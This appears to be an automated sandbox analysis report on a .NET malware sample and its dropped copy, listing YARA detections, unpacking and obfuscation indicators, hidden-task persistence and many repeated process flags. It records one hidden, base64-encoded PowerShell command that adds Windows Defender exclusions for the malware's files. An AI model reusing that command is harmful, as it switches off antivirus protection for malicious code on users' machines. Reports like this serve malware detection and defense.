Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D324000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2130015050.000001FA0CB80000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C1904000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: o9OIGsDt4m.exe, ValClassDeSerializer.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: o9OIGsDt4m.exe, WrapperVisitorProperty.cs	.Net Code: QueryField System.Reflection.Assembly.Load(byte[])
Source: 0.2.o9OIGsDt4m.exe.1fa0cb20000.1.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.o9OIGsDt4m.exe.1fa0cb20000.1.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.o9OIGsDt4m.exe.1fa0cb20000.1.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.o9OIGsDt4m.exe.1fa0cb20000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.o9OIGsDt4m.exe.1fa0cb20000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.o9OIGsDt4m.exe.1fa1d216a50.3.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.o9OIGsDt4m.exe.1fa1d216a50.3.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.o9OIGsDt4m.exe.1fa1d216a50.3.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.o9OIGsDt4m.exe.1fa1d216a50.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.o9OIGsDt4m.exe.1fa1d216a50.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.o9OIGsDt4m.exe.1fa1d266a88.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.o9OIGsDt4m.exe.1fa1d266a88.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.o9OIGsDt4m.exe.1fa1d266a88.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.o9OIGsDt4m.exe.1fa1d266a88.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.o9OIGsDt4m.exe.1fa1d266a88.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==

Yara detected Costura Assembly Loader

Source: Yara match	File source: 9.2.Current.exe.1f96f3b5b38.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Current.exe.226c14319e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.o9OIGsDt4m.exe.1fa0b160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Current.exe.226c1635b70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Current.exe.226c1815be0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Current.exe.1f96f5e5be0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Current.exe.1f96f2019e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.o9OIGsDt4m.exe.1fa1d125be0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.o9OIGsDt4m.exe.1fa1cf44d98.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Current.exe.1f96f405b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Current.exe.1f96f3b5b38.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Current.exe.226c15e5b38.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Current.exe.226c15e5b38.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.o9OIGsDt4m.exe.1fa1d1c5c18.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.o9OIGsDt4m.exe.1fa1cf6cdd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.o9OIGsDt4m.exe.1fa1cf44d98.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2691830149.000001F95F1C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2129713710.000001FA0B160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132804685.000001FA1D125000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2696904592.000001F96F405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2691830149.000001F95F0B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2181255354.00000226C1815000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132804685.000001FA1CEF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2181255354.00000226C15E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2167540557.00000226B12E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2696904592.000001F96F5E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2696904592.000001F96F201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2181255354.00000226C1431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2696904592.000001F96F3B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: o9OIGsDt4m.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInUtil.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 2584, type: MEMORYSTR

Source: o9OIGsDt4m.exe

Static PE information: 0xCA1C2F5D [Sun Jun 13 21:19:25 2077 UTC]

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B5C30 pushad ; retf	0_2_00007FF8490B5C31
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B7C2E pushad ; retf	0_2_00007FF8490B7C5D
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B7C5E push eax; retf	0_2_00007FF8490B7C6D
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Code function: 0_2_00007FF8490B2B86 push cs; iretd	0_2_00007FF8490B2C9F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E1D2A5 pushad ; iretd	2_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F385FA push ebx; retn 000Ah	2_2_00007FF848F3863A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F3863D push ebx; retn 000Ah	2_2_00007FF848F3863A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F384FA push ebx; retn 000Ah	2_2_00007FF848F385AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F385AD push ebx; retn 000Ah	2_2_00007FF848F385AA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Code function: 5_2_00007FF8490A4058 pushfd ; ret	5_2_00007FF8490A4059
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F6E3B0 push eax; ret	9_2_00007FF848F6E41C
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F49121 push BEFFFFDEh; retf 0000h	9_2_00007FF848F49126
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F4A0BD push ds; iretd	9_2_00007FF848F4A0C3
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 9_2_00007FF848F477CA push esp; iretd	9_2_00007FF848F477D1

Source: o9OIGsDt4m.exe	Static PE information: section name: .text entropy: 7.959305548795795
Source: Current.exe.0.dr	Static PE information: section name: .text entropy: 7.959305548795795

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.2130103490.000001FA0CE27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: o9OIGsDt4m.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 7104, type: MEMORYSTR

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

File created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.2130103490.000001FA0CE27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: o9OIGsDt4m.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 7104, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\f0930ecea57995ff14ba3bd9594d3a7b 7FA38A2E3D13DAD8E5C29647F3D70E72

Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
